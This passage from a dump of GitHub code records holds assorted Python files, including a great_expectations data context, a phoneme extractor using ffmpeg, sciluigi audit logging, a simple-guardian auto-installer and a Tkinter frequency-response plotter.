config=self._project_config,\n )\n return variables\n\n def _init_datasource_store(self) -> None:\n from great_expectations.data_context.store.datasource_store import (\n DatasourceStore,\n )\n\n store_name: str = \"datasource_store\" # Never explicitly referenced but adheres\n # to the convention set by other internal Stores\n store_backend: dict = {\"class_name\": \"InMemoryStoreBackend\"}\n\n datasource_store: DatasourceStore = DatasourceStore(\n store_name=store_name,\n store_backend=store_backend,\n )\n self._datasource_store = datasource_store\n\n def _save_project_config(self) -> None:\n \"\"\"Since EphemeralDataContext does not have config as a file, display logging message instead\"\"\"\n logger.debug(\n \"EphemeralDataContext has been detected - skipping DataContext._save_project_config\"\n )\n return None\n\n def save_expectation_suite(\n self,\n expectation_suite: ExpectationSuite,\n expectation_suite_name: Optional[str] = None,\n overwrite_existing: bool = True,\n **kwargs: Dict[str, Any],\n ):\n \"\"\"Save the provided expectation suite into the DataContext.\n\n Args:\n expectation_suite: the suite to save\n expectation_suite_name: the name of this expectation suite. If no name is provided the name will \\\n be read from the suite\n\n overwrite_existing: bool setting whether to overwrite existing ExpectationSuite\n\n Returns:\n None\n \"\"\"\n if expectation_suite_name is None:\n key: ExpectationSuiteIdentifier = ExpectationSuiteIdentifier(\n expectation_suite_name=expectation_suite.expectation_suite_name\n )\n else:\n expectation_suite.expectation_suite_name = expectation_suite_name\n key: ExpectationSuiteIdentifier = ExpectationSuiteIdentifier(\n expectation_suite_name=expectation_suite_name\n )\n if self.expectations_store.has_key(key) and not overwrite_existing:\n raise ge_exceptions.DataContextError(\n \"expectation_suite with name {} already exists. If you would like to overwrite this \"\n \"expectation_suite, set overwrite_existing=True.\".format(\n expectation_suite_name\n )\n )\n self._evaluation_parameter_dependencies_compiled = False\n return self.expectations_store.set(key, expectation_suite, **kwargs)\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/great-expectations/venv/lib/python3.8/site-packages/great_expectations/data_context/data_context/ephemeral_data_context.py","file_name":"ephemeral_data_context.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"2793073827","text":"import sys\ninput = sys.stdin.readline\n\ndef VPS(chars):\n stack = []\n for char in chars:\n if char == \"(\":\n stack.append(char)\n else:\n if len(stack) >= 1 and stack[-1] == \"(\":\n stack.pop()\n else:\n return \"NO\"\n if len(stack)==0:\n return \"YES\"\n else:\n return \"NO\"\n\nN = int(input())\nfor _ in range(N):\n chars = str(input().rstrip())\n print(VPS(chars))","repo_name":"silverjjj/algorithm","sub_path":"BOJ/9012.py","file_name":"9012.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21479288090","text":"import os\nimport sys\nimport subprocess\nimport json\nimport math\nimport statistics\n\n# Converts seconds to timestamp string\ndef seconds_to_ffmpeg_format(seconds):\n result = str(math.floor(seconds/3600))+\":\"+str(math.floor(seconds/60)%60)+\":\"+str(seconds%60)\n return result\n\n\ndef create_ffmpeg_command(folder_name, word, phone_index):\n command = \"ffmpeg -i \"\n command = command + folder_name \n phone_offset = word['start']\n for j in range(phone_index):\n phone_offset += word['phones'][j]['duration']\n # Continue assembly of command\n # Beginning\n command = command + \".mp3 -vn -acodec mp3 -ss \" + seconds_to_ffmpeg_format(phone_offset)\n command = command + \" -t \" + seconds_to_ffmpeg_format(word['phones'][i]['duration'])\n\n file_name = folder_name + \"/\" + word['phones'][phone_index]['phone'][:-2] + \"/\"\n\n try:\n os.mkdir(file_name)\n except FileExistsError:\n pass\n #create incrementing numerical names\n name_found = False\n numerical_extension = 0;\n while not name_found:\n if not os.path.isfile(file_name + str(numerical_extension) + '.mp3'):\n file_name += str(numerical_extension) + '.mp3 -loglevel warning -y'\n name_found = True\n numerical_extension += 1\n\n # Adding name of the phoneme extract\n command = command + \" \" + file_name\n print(command)\n return command\n\n\n# Get the name of the gentle output file from CLI\njsonfile = sys.argv[1]\n\nif not os.path.exists(jsonfile):\n print(\"file \" + jsonfile + \" doesn't exist! aborting...\", file=sys.stderr)\n sys.exit()\n\nfolder = str(sys.argv[2]) if len(sys.argv) > 2 else \"\"\nif not folder.strip():\n folder = str(os.path.splitext(jsonfile)[0])\nprint(\"writing to folder \" + folder)\n\nwith open(jsonfile) as json_file:\n data = json.load(json_file)\n\ntry:\n os.mkdir(folder)\nexcept FileExistsError:\n #the folder already existsif not jsonfile.endswith(\"json\"):\n pass\n\n\n#decide which phoneme to use\n# Loop through each word of the transcript\nphoneme_map = {}\nfor word in data['words']:\n # Word has to be in the audio file\n if word['case'] != \"not-found-in-audio\":\n # Iterates phonemes\n for i in range(len(word[\"phones\"])):\n if word['phones'][i]['phone'] in phoneme_map:\n phoneme_map[word['phones'][i]['phone']].append(word['phones'][i]['duration'])\n else:\n phoneme_map[word['phones'][i]['phone']] = [word['phones'][i]['duration']]\n\n #iterates over the phonomes, and replaces the list of all durations with the average duration \nfor phonome in phoneme_map:\n sum_of_all_durations = 0\n for value in phoneme_map[phonome]:\n sum_of_all_durations += float(value)\n average = sum_of_all_durations / len(phoneme_map[phonome])\n print(phoneme_map[phonome])\n try:\n standart_deviation = statistics.stdev(phoneme_map[phonome])\n except statistics.StatisticsError:\n standart_deviation = 0.1\n phoneme_map[phonome] = [average, standart_deviation]\n\n\n# Loop through each word of the transcript\nfor word in data['words']:\n # Word has to be in the audio file\n if word['case'] != \"not-found-in-audio\":\n # Iterates phonemes\n for i in range(len(word[\"phones\"])):\n # Check whether phoneme already exists as saved file\n # assemble ffmpeg command and execute it\n if word['phones'][i]['duration'] >= phoneme_map[word['phones'][i]['phone']][0] - phoneme_map[word['phones'][i]['phone']][1] and\\\n word['phones'][i]['duration'] <= phoneme_map[word['phones'][i]['phone']][0] + phoneme_map[word['phones'][i]['phone']][1]:\n os.system(create_ffmpeg_command(jsonfile.replace(\".json\",\"\"), word, i))\n \n # Progress/status\n print(\"currently at \" + seconds_to_ffmpeg_format(word['start']) + \" from \" + seconds_to_ffmpeg_format(data['words'][-1]['end']))\n","repo_name":"Jugendhackt/synthi-tts","sub_path":"json-times-voice-to-samples.py","file_name":"json-times-voice-to-samples.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"19528836198","text":"\ndef menu():\n print(\"\\nMenu\\n 1 - Soma de 2 números.\\n 2 - Diferença entre 2 números (maior pelo menor).\")\n print(\" 3 - Produto entre 2 números.\\n 4 - Divisão entre 2 números (o denominador não pode ser zero) .\\n\")\n numero = int(input(\"Escolha uma opção:\"))\n\n return numero\n\n\ndef opcao(n, num1, num2):\n if n == 1:\n resultado = num1 + num2\n print(f\"A soma entre os dois números é {resultado}\")\n elif n == 2:\n if num1 > num2:\n resultado = num1 - num2 \n elif num1 < num2:\n resultado = num2 - num1\n else:\n resultado = 0\n print(f\"A diferença entre os dois números é {resultado}\")\n elif n == 3:\n resultado = num1 * num2\n print(f\"O produto entre os dois número é {resultado}\") \n elif n == 4:\n if num2 != 0:\n resultado = float(num1) / float (num2)\n print(f\"A divisão entre os dois números é {resultado}\")\n else:\n print(\"Erro: o denominador não pode ser zero!\")\n else:\n print(\"Opção Inválida!\") \n\n\nvalor1 = int(input(\"Digite o primeiro número:\"))\nvalor2 = int(input(\"Digite o segundo número:\"))\nopcao(menu(), valor1, valor2)\n","repo_name":"JhonatanBS/Curso-Python","sub_path":"Estrutura_Condicional/Condicional_01.py","file_name":"Condicional_01.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72897300307","text":"'''\nThis module contains functionality for the audit-trail logging functionality\n'''\n\nimport logging\nimport luigi\nimport os\nimport random\nimport time\n\n# ==============================================================================\n\nlog = logging.getLogger('sciluigi-interface')\n\n# ==============================================================================\n\nclass AuditTrailHelpers(object):\n '''\n Mixin for luigi.Task:s, with functionality for writing audit logs of running tasks\n '''\n def add_auditinfo(self, infotype, infoval):\n '''\n Alias to _add_auditinfo(), that can be overridden.\n '''\n return self._add_auditinfo(self.instance_name, infotype, infoval)\n\n def _add_auditinfo(self, instance_name, infotype, infoval):\n '''\n Save audit information in a designated file, specific for this task.\n '''\n dirpath = self.workflow_task.get_auditdirpath()\n if not os.path.isdir(dirpath):\n time.sleep(random.random())\n if not os.path.isdir(dirpath):\n os.makedirs(dirpath)\n\n auditfile = os.path.join(dirpath, instance_name)\n if not os.path.exists(auditfile):\n with open(auditfile, 'w') as afile:\n afile.write('[%s]\\n' % self.instance_name)\n with open(auditfile, 'a') as afile:\n afile.write('%s: %s\\n' % (infotype, infoval))\n\n def get_instance_name(self):\n '''\n Return the luigi instance_name\n '''\n instance_name = None\n if self.instance_name is not None:\n instance_name = self.instance_name\n else:\n instance_name = self.task_id\n return instance_name\n\n @luigi.Task.event_handler(luigi.Event.START)\n def save_start_time(self):\n '''\n Log start of execution of task.\n '''\n if hasattr(self, 'workflow_task') and self.workflow_task is not None:\n msg = 'Task {task} started'.format(\n task=self.get_instance_name())\n log.info(msg)\n\n @luigi.Task.event_handler(luigi.Event.PROCESSING_TIME)\n def save_end_time(self, task_exectime_sec):\n '''\n Log end of execution of task, with execution time.\n '''\n if hasattr(self, 'workflow_task') and self.workflow_task is not None:\n msg = 'Task {task} finished after {proctime:.3f}s'.format(\n task=self.get_instance_name(),\n proctime=task_exectime_sec)\n log.info(msg)\n self.add_auditinfo('task_exectime_sec', '%.3f' % task_exectime_sec)\n for paramname, paramval in self.param_kwargs.items():\n if paramname not in ['workflow_task']:\n self.add_auditinfo(paramname, paramval)\n","repo_name":"pharmbio/sciluigi","sub_path":"sciluigi/audit.py","file_name":"audit.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":329,"dataset":"github-code","pt":"48"} +{"seq_id":"7078760309","text":"\"\"\"Wrapper for launching DistAlgo programs.\n\nThis module provides a launch() function that invokes the interpreter\non this module in a subprocess. The __main__ routine in turn calls\nthe DistAlgo entry point.\n\"\"\"\n\n\nimport os\nimport json\nimport subprocess\nimport re\nimport configparser\nfrom os.path import join\nfrom types import SimpleNamespace\n\n\nclass DistAlgoError(subprocess.CalledProcessError):\n \n def __str__(self):\n return ('Command {} returned non-zero exit status {}\\n'\n 'stderr output:\\n{}'.format(\n self.cmd, self.returncode, self.output))\n\n\ndef get_config():\n \"\"\"Read config.txt to determine appropriate environment variables\n and paths.\n \"\"\"\n config = configparser.ConfigParser()\n dirname = os.path.dirname(__file__)\n config.read(join(dirname, '../config.txt'))\n pyconf = config['python']\n \n ns = SimpleNamespace()\n \n ns.python34 = pyconf['python34']\n ns.incoq_root = pyconf['INCOQ_ROOT']\n ns.distalgo_path = pyconf['DISTALGO_PATH']\n \n da_exp_dir = os.path.join(ns.incoq_root, 'experiments/distalgo')\n ns.pythonpath = (ns.incoq_root + ';' + ns.distalgo_path + ';' +\n da_exp_dir)\n \n return ns\n\n\ndef parse_output(s):\n \"\"\"Parse a string of standard output text for the \"OUTPUT: \"\n line and return the parsed JSON object.\n \"\"\"\n m = re.search(r'^OUTPUT: (.*)', s, re.MULTILINE)\n if m is None:\n return None\n return json.loads(m.group(1))\n\n\ndef launch(config, dafile, incfile, daargs):\n \"\"\"Launch the specified DistAlgo program in a subprocess that\n captures/parses standard output and error. Return a JSON object\n obtained by parsing stdout for a line \"OUTPUT: \", where\n is JSON-encoded data.\n \"\"\"\n python = config.python34\n dirname = os.path.dirname(__file__)\n \n env = dict(os.environ.items())\n # Don't let python33's standard library paths override\n # python 34's.\n env['PYTHONPATH'] = config.pythonpath\n \n args = [\n python,\n __file__,\n '-i',\n '-m',\n incfile,\n dafile,\n ]\n args.extend(daargs)\n \n child = subprocess.Popen(\n args, bufsize=-1,\n # To debug, comment out this line to make stdout/stderr\n # the same standard out and error streams as the parent.\n # Alternatively (if the process terminates), uncomment\n # the print statements below.\n # In the future, maybe use something like\n # http://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n cwd=dirname,\n env=env,\n universal_newlines=True)\n \n stdout, stderr = child.communicate()\n results = parse_output(stdout)\n# print(stderr)\n# print(stdout)\n \n if child.returncode != 0:\n raise DistAlgoError(child.returncode, args, stderr)\n \n return results\n\n\nif __name__ == '__main__':\n import da\n da.libmain()\n","repo_name":"IncOQ/incoq","sub_path":"experiments/distalgo/distalgo_bridge.py","file_name":"distalgo_bridge.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"43388711323","text":"#!/usr/bin/python3\n\"\"\"posting email address to a certain URL\"\"\"\nimport requests\nimport sys\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n email = sys.argv[2]\n responce = requests.post(url, data={'email': email})\n print(responce.text)\n","repo_name":"Reem-Kamal-Ghoniem/alx-higher_level_programming","sub_path":"0x11-python-network_1/6-post_email.py","file_name":"6-post_email.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38744256854","text":"#!/usr/bin/env python3\n\nfilename = \"roms/Diag_F4_1133CMD.BIN\"\nbase_address = 0x9800\n\nfrom diag_common import *\n\nfunctions = [\n (0x0a5, 0x112, \"WriteString\"),\n (0x0bb, 0x102, \"ReadChar\"),\n (0x0c5, 0x110, \"Fn_0c5\"),\n (0x0d0, 0x10a, \"Fn_0d0\"),\n (0x101, 0x104, \"FinishTest\"), # Prints Pass or Fail. checks 0x108 to see if test passed or failed\n (0x133, 0x10e, \"PressSpaceThenExit\"),\n (0x16f, 0x106, \"PrintCtrlCToExit\"), # prints out \"(CONTROL-C TO EXIT)\"\n (0x18b, 0x100, \"Init\"),\n (0x1ee, 0x118, \"Fn_1ee\"), # not called\n (0x291, 0x10c, \"Fn_291\"), # not called\n]\n\nif __name__ == \"__main__\":\n with open(filename, \"rb\") as f:\n bytes = f.read()\n\n memory = b\"\\0\" * (base_address) + bytes + b\"\\0\" * (0x10000 - (len(bytes) + base_address))\n\n #scan_calls(memory, base_address, base_address)\n\n for (addr, indirect_addr, name) in functions:\n memory_addr_info[base_address + addr].label = name\n memory_addr_info[indirect_addr].label = name\n entry_points.append(base_address + addr)\n\n body_addr = parse_header(memory, base_address, base_address)\n\n scan_strings(memory, body_addr)\n\n entry_points.append(0x9ae2)\n entry_points.append(0x9d45)\n entry_points.append(0x9e08)\n entry_points.append(0x9ea7)\n\n disassemble(memory, entry_points)\n","repo_name":"Nakazoto/CenturionComputer","sub_path":"!Other Gits/Phire - centurion_isa-main/disassemble_f4.py","file_name":"disassemble_f4.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"48"} +{"seq_id":"4328840562","text":"# Write your solution here\ndef squared(name, num):\n st = name * num * num\n i = 0\n j = 1\n while j <= num:\n print(st[i:i + num])\n i += num\n j += 1\n\nif __name__ == \"__main__\":\n squared(\"ab\", 3)","repo_name":"emitrofanova/Course-mooc-programming-22","sub_path":"part03-34_word_squared/src/word_squared.py","file_name":"word_squared.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16715653091","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport numpy as np\nimport nltk\nfrom scipy import spatial\nfrom sklearn.metrics.pairwise import cosine_similarity\nsys.path.append(os.path.abspath(\"../embedding\"))\nfrom fasttext_embedding import fastTextEmbedder\n# from elmo_embedding import elmo_embedding\n# from bert_embedding import bert_embedding\n# # bert-serving-start -model_dir \"C:/Users/Hussein/Documents/Research/FYP-Arabic NLP/bert/multilingual_L-12_H-768_A-12\" -num_worker=1\n\nclass embeddingReader:\n def __init__(self, embedder):\n self.embedder = embedder\n\n def concatenateString(self, paragraph, start, length):\n final_string = paragraph[start]\n for i in range(1, length):\n final_string += \" \" + paragraph[start + i]\n return final_string\n\n def get_answer_canditates(self, paragraph):\n para_sents = nltk.sent_tokenize(paragraph)\n candidates = []\n for sent in para_sents:\n para_words = sent.split()\n for i in range(0, len(para_words)):\n for j in range(1, min(15, len(para_words) - i + 1)):\n candidate = self.concatenateString(para_words, i, j)\n candidates.append(candidate)\n return candidates\n\n def read(self, P, Q):\n A = self.get_answer_canditates(P)\n A_embed = []\n for a in A:\n A_embed.append(self.embedder.embed(a))\n Q_embed = self.embedder.embed(Q)\n similarities_raw = cosine_similarity(A_embed, Q_embed.reshape(1, -1))\n similarities = [s[0] for s in similarities_raw]\n indices_sorted = np.argsort(similarities)[::-1] # reverse order\n return A[indices_sorted[0]]\n","repo_name":"husseinmozannar/SOQAL","sub_path":"baselines_reading/embedding_match.py","file_name":"embedding_match.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"48"} +{"seq_id":"5762406182","text":"import math\n\nl = 1\nm = 0\nwhile True:\n n = raw_input(\"Please enter a number:\")\n if n.strip() == 'done':\n break\n n = int(n)\n m += n\n fl = float(m)\n print (fl/l)\n l += 1\n","repo_name":"ajschumacher/gadsdc2","sub_path":"06-python/RunningAvg_nolist_KellyO.py","file_name":"RunningAvg_nolist_KellyO.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"33810240024","text":"import sys\nimport os\nimport urllib.request\nimport tempfile\nimport zipfile\nimport shutil\nfrom subprocess import check_call, CalledProcessError\n\nlogin_key = \"{{ login_key }}\"\nzip_url = \"{{ zip_url }}\"\nzip_file = tempfile.mkstemp()[1]\ntarget_directory = \"/usr/share/simple-guardian\"\n\n\ndef run(cmd):\n try:\n check_call(cmd)\n except CalledProcessError:\n print('ERRROR: running command \"%s\" failed for some reason' % cmd)\n except OSError:\n print('ERRROR: running command \"%s\" failed - the command was not found' % cmd)\n\n\n# CHECK REQUIREMENTS\n# - check Python 3 is ued\nif sys.version_info[0] != 3:\n print('you must run this auto installer with Python 3')\n print(\"ERROR: CHECKING REQUIREMENTS FAILED\")\n exit(1)\n# - check root right are available\nif os.geteuid() != 0:\n print('you must give this script root\\'s rights')\n print(\"ERROR: CHECKING REQUIREMENTS FAILED\")\n exit(1)\n# - check that pip and venv are installed\ntry:\n check_call([sys.executable, '-m', 'pip', '-V'])\n check_call([sys.executable, '-m', 'ensurepip'])\nexcept CalledProcessError:\n print('it seems that pip/venv is/are missing. I will try to compensate that')\n try:\n check_call(['apt', 'install', '-y', 'python3-pip', 'python3-venv'])\n except CalledProcessError:\n print(\"that didn't make it better, this one is on you\")\n print(\"try to install python3-pip python3-venv on Ubuntu/Debian based systems\")\n print(\"ERROR: CHECKING REQUIREMENTS FAILED\")\n exit(1)\nprint('requirements checked, all OK')\n\nprint('obtaining latest release from %s' % zip_url)\nurllib.request.urlretrieve(zip_url, zip_file)\n\nprint('extracting zip content into temporary folder')\nextracted_dir = tempfile.mkdtemp()\nwith zipfile.ZipFile(zip_file, \"r\") as zip_ref:\n zip_ref.extractall(extracted_dir)\nos.unlink(zip_file)\n\nprint('running simple-guardian\\'s installer')\nrun([sys.executable, '{0}/simple-guardian-master/install.py'.format(extracted_dir)])\n\nprint('removing source files')\nshutil.rmtree(extracted_dir)\n\nprint('logging in with server')\nrun(['simple-guardian-client', 'login', login_key])\n\nprint('removing packed profiles')\nos.unlink(target_directory + \"/data/profiles/default.json\")\n\nprint('restarting service')\nrun(['service', 'simple-guardian', 'restart'])\n\nprint('all done')\n","repo_name":"esoadamo/simple-guardian-server","sub_path":"templates/autoinstall.py","file_name":"autoinstall.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71645211345","text":"from omegaconf import OmegaConf\nimport hydra\nimport hydra.utils\n\ndef hydra_conf_load_from_checkpoint(chkpt_file, cfg):\n instance_args = dict()\n cfg_mask = list()\n for k in cfg.keys():\n if OmegaConf.is_dict(cfg[k]) and '_target_' in cfg[k]:\n instance_args[k] = hydra.utils.instantiate(cfg[k])\n else:\n cfg_mask += [k]\n ModuleType = type(hydra.utils.instantiate(cfg))\n return ModuleType.load_from_checkpoint(\n chkpt_file,\n map_location=lambda storage, loc: storage,\n **OmegaConf.masked_copy(cfg, cfg_mask),\n **instance_args\n )","repo_name":"ivandariojr/LyapunovLearning","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"3718807887","text":"from tkinter import*\r\nimport cmath\r\nimport math\r\nimport tkinter.messagebox\r\nroot =Tk()\r\nroot.configure(bg='#eedd82')\r\nrnum= [ ];\r\nrden = [ ];\r\ninum = [ ];\r\niden= [ ];\r\nwr = [0] ;\r\nsc=[];\r\nroot.title(\"wm min/max\")\r\nroot.resizable(0,0)\r\nglobal h\r\nglobal t\r\nglobal p\r\nglobal q\r\nglobal gain\r\nglobal name\r\nglobal Wn\r\nglobal delta\r\nzcount=0;\r\npcount=0;\r\nq=0;\r\nh=0;\r\nt=0;\r\np=0;\r\nglobal k\r\nglobal l\r\nk=0;\r\nl=0;\r\ndef helpmenu() :\r\n sub3 = Toplevel(root)\r\n sub3.title(\"wm min/max\")\r\n sub3.title('HELP')\r\n sub3.resizable(0,0)\r\n\r\n var=\"\"\"\r\nINTRODUCTION \r\n\r\nThe program is a GUI based transfer function analysis package .It takes in\r\nthe values of poles, zeroes and the gain factor of a transfer function.\r\nFrom this it gives the frequency plot, both absolute and bode, and the\r\ntime response which includes step and impulse response. It can also be\r\nused for estimating the stability of the system.\r\nThis software gives the user, better understanding on how the frequency\r\nand time response depends on the poles, zeroes and the gain factor.\r\nIt helps the user to export the project and study it in other softwares. \r\n\r\nABOUT THE SOFTWARE\r\n \r\nGraphical User Interface (GUI) is a type of interface that allows users to\r\ninteract with electronic devices through graphical icons and visual indicators.\r\nProgramming in GUI needs a language as a platform. The software adapts Python\r\nto develop a code which gives the desired output.\r\nUsing GUI programming in Python, a package is designed to obtain the\r\nfrequency and time response of a system by computing its transfer function.\r\nPython provides various options for developing graphical user interfaces (GUIs)\r\nout of which one is Tkinter. Tkinter is the standard GUI library for Python.\r\nPython when combined with Tkinter provides a fast and easy way to create\r\nGUI applications.\r\n\r\n\r\n\r\nINPUT FEATURES\r\n\r\n• Magnitude and angle of the poles and zeroes can be located graphically\r\n with the help of an expandable circle and a movable line controlled\r\n using the arrow keys or mouse.\r\n {Left and Right arrow keys for angle variations of 1 degrees\r\n Up and Down keys for magnitude variations by 0.1}\r\n• The assigned poles are marked by ‘x’ mark and zeroes by ‘o’ mark.\r\n• Poles can be entered by using ENTER key or the right click of the mouse.\r\n The zeroes are entered using the SHIFT key or left click of the mouse.\r\n• The user may give the gain factor in the entry box.\r\n• The user can specify the frequency range in which he/she may want to\r\n view the output.\r\n• Click on the Edit button to edit the poles and zeroes after their\r\n entry is done.\r\n\r\n\r\n\r\nMAIN WINDOW COMPONENTS\r\n\r\nA menu bar is provided containing the following:\r\n\r\nFILE:\r\n New project : To create a new project .\r\n Save project : To save the project.\r\n Load project: To import and read from a text file.\r\n Exit: To exit the program.\r\n\r\nFREQUENCY RESPONSE:\r\n Absolute response: |H(jw)| vs w and magmax) :\r\n magmax=abs(mag1)\r\n rem=magmax\r\n f=-1\r\n while(rem>=10) :\r\n rem= rem/ 10\r\n f=f+1;\r\n div=int(rem+1)*pow(10,f)\r\n if(magmax <1):\r\n rem1 = magmax\r\n f=0\r\n while(rem1<=1):\r\n rem1=rem1*10;\r\n f=f-1;\r\n div=int(rem1+1)*pow(10,f-1)\r\n\r\n if(abs(ang1)>angmax) :\r\n angmax=abs(ang1)\r\n rema=angmax\r\n f1=1\r\n if(rema>=45) :\r\n rema= int(rema/ 180)\r\n f1=f1+rema;\r\n if(angmax <45):\r\n rema1 = angmax\r\n f1=(1/4.5)\r\n \r\n d=d+1\r\n d=0\r\n mag1=0\r\n ang1=0\r\n while(d<1000):\r\n num=1;\r\n den=1;\r\n numa=0;\r\n dena=0;\r\n w=pow(10,((d-200)/200))\r\n for g in range (k) :\r\n num= num * cmath.sqrt(pow((w-inum[g]),2) + pow(rnum[g],2));\r\n m=math.degrees(math.atan2((w-inum[g]),rnum[g]))\r\n if(m<0):\r\n m=m+360\r\n numa = numa + m;\r\n for m in range (l) :\r\n den= den* cmath.sqrt(pow((w-iden[m]),2) + pow(rden[m],2));\r\n md=math.degrees(math.atan2((w-iden[m]),rden[m]))\r\n if(md<0):\r\n md=md+360\r\n dena = dena + md;\r\n mag=mag1;\r\n ang=ang1;\r\n mag1=20*math.log10(abs(gain*num/den)); \r\n ang1=(numa - dena);\r\n canvas3.create_line(d+100,(150-(10*mag/div)),d+101,(150-(10*mag1/div)),width=2)\r\n canvas4.create_line(d+100,(150-((25*ang)/(45*f1))),d+101,(150-((25*ang1)/(45*f1))),width=2)\r\n d=d+1;\r\n \r\n for i in range(6):\r\n x= 100 + (i*200)\r\n canvas3.create_line(x,150,x,145,width=2)\r\n canvas3.create_text(x,155,text='%.1f'%(pow(10,(i-1))),anchor=\"ne\")\r\n for j in range(11):\r\n y= 250 - (j*20)\r\n canvas3.create_line(100,y,105,y,width=2)\r\n canvas3.create_text(95,y,text='%.3f'%((-5 +j)* 2*div),anchor=E)\r\n for i in range(6):\r\n x= 100 + (i*200)\r\n canvas4.create_line(x,150,x,145,width=2)\r\n canvas4.create_text(x,155,text='%.1f'%(pow(10,(i-1))),anchor=\"ne\")\r\n for j in range(9):\r\n y= 250 - (j*25)\r\n canvas4.create_line(100,y,105,y,width=2)\r\n canvas4.create_text(95,y,text='%.2f'%((-4 +j)*45*f1),anchor=E)\r\n\r\n\r\ndef freqop () :\r\n global canvas1\r\n sub1 = Toplevel(root)\r\n sub1.title(\"wm min/max\")\r\n sub1.resizable(0,0)\r\n sub1.title(\"ABSOLUTE PLOT\")\r\n frame=Frame(sub1)\r\n frame.pack()\r\n bottomframe=Frame(sub1)\r\n bottomframe.pack(side= BOTTOM)\r\n w=0\r\n mag= 1;\r\n ang= 0;\r\n xvar = [ ];\r\n wm = [ ];\r\n Ang = [ ];\r\n numa=0;\r\n dena=0;\r\n global k\r\n global l\r\n sc.append(0);\r\n scrollbar = Scrollbar(frame)\r\n scrollbar.pack( side = BOTTOM, fill=Y )\r\n canvas1 = Canvas(frame,width=600,height=300,bg='#eeeee0',xscrollcommand=scrollbar.set,scrollregion=(0,0,5000,5000))\r\n canvas1.pack()\r\n scrollbar1 = Scrollbar(bottomframe)\r\n scrollbar1.pack( side = BOTTOM, fill=Y )\r\n canvas2 = Canvas(bottomframe,width=600,height=300,bg='#cdcdc1',xscrollcommand=scrollbar.set,scrollregion=(0,0,5000,5000))\r\n canvas2.pack()\r\n scrollbar.config( command = canvas1.xview,orient= HORIZONTAL )\r\n scrollbar1.config( command = canvas2.xview,orient= HORIZONTAL )\r\n canvas1.create_text(20,80,text=\"\\n\".join(\"MAGNITUDE\"), anchor=\"nw\")\r\n canvas1.create_text(300,20,text=\"MAGNITUDE PLOT\")\r\n canvas1.create_text(300,280,text=\"FREQUENCY (in rad/s)\") \r\n canvas2.create_text(20,120,text=\"\\n\".join(\"ANGLE\"), anchor=\"nw\")\r\n canvas2.create_text(300,20,text=\"ANGLE PLOT\")\r\n canvas2.create_text(300,280,text=\"FREQUENCY (in rad/s)\") \r\n \r\n \r\n if(len(sc)==1) :\r\n scale = 0.005\r\n \r\n \r\n else :\r\n sc.remove(0)\r\n scale= 0.005*min(sc)\r\n \r\n UL= scale*500\r\n ful=-1\r\n remul=UL\r\n while(remul>=1) :\r\n remul= remul/ 10\r\n ful=ful+1;\r\n if(UL <1):\r\n rem1ul = UL\r\n ful=0\r\n while(rem1ul<=1):\r\n rem1ul=rem1ul*10;\r\n ful=ful-1;\r\n UL= pow(10,(ful+1))\r\n canvas1.create_line(100,250,100,50,width=2)\r\n canvas1.create_line(100,250,100+(UL/scale),250,width=2)\r\n canvas2.create_line(100,250,100,50,width=2)\r\n canvas2.create_line(100,150,100+(UL/scale),150,width=2)\r\n it=0\r\n \r\n \r\n mag1=0\r\n w=0;\r\n n=0;\r\n magmax=0\r\n ang1=0\r\n angmax=0\r\n while(wmagmax) :\r\n magmax=mag1\r\n rem=magmax\r\n f=-1\r\n while(rem>=10) :\r\n rem= rem/ 10\r\n f=f+1;\r\n div=int(rem+1)*pow(10,f)\r\n if(magmax <1):\r\n rem1 = magmax\r\n f=0\r\n while(rem1<=1):\r\n rem1=rem1*10;\r\n f=f-1;\r\n div= int(rem1+1)*pow(10,f-1)\r\n if(abs(ang1)>angmax) :\r\n angmax=abs(ang1)\r\n rema=angmax\r\n f1=1\r\n if(rema>=45) :\r\n rema= int(rema/ 180)\r\n f1=f1+rema;\r\n if(angmax <45):\r\n rema1 = angmax\r\n f1=(1/4.5)\r\n w=w+scale;\r\n n=n+1;\r\n\r\n mag1=0\r\n ang1=0\r\n w=0;\r\n n=0; \r\n while(w=1) :\r\n remul= remul/ 10\r\n ful=ful+1;\r\n if(UL <1):\r\n rem1ul = UL\r\n ful=0\r\n while(rem1ul<=1):\r\n rem1ul=rem1ul*10;\r\n ful=ful-1;\r\n UL= pow(10,(ful+1))\r\n while(nvmagmax) :\r\n magmax=abs(mag1)\r\n rem=magmax\r\n f=-1\r\n while(rem>=10) :\r\n rem= rem/ 10\r\n f=f+1;\r\n 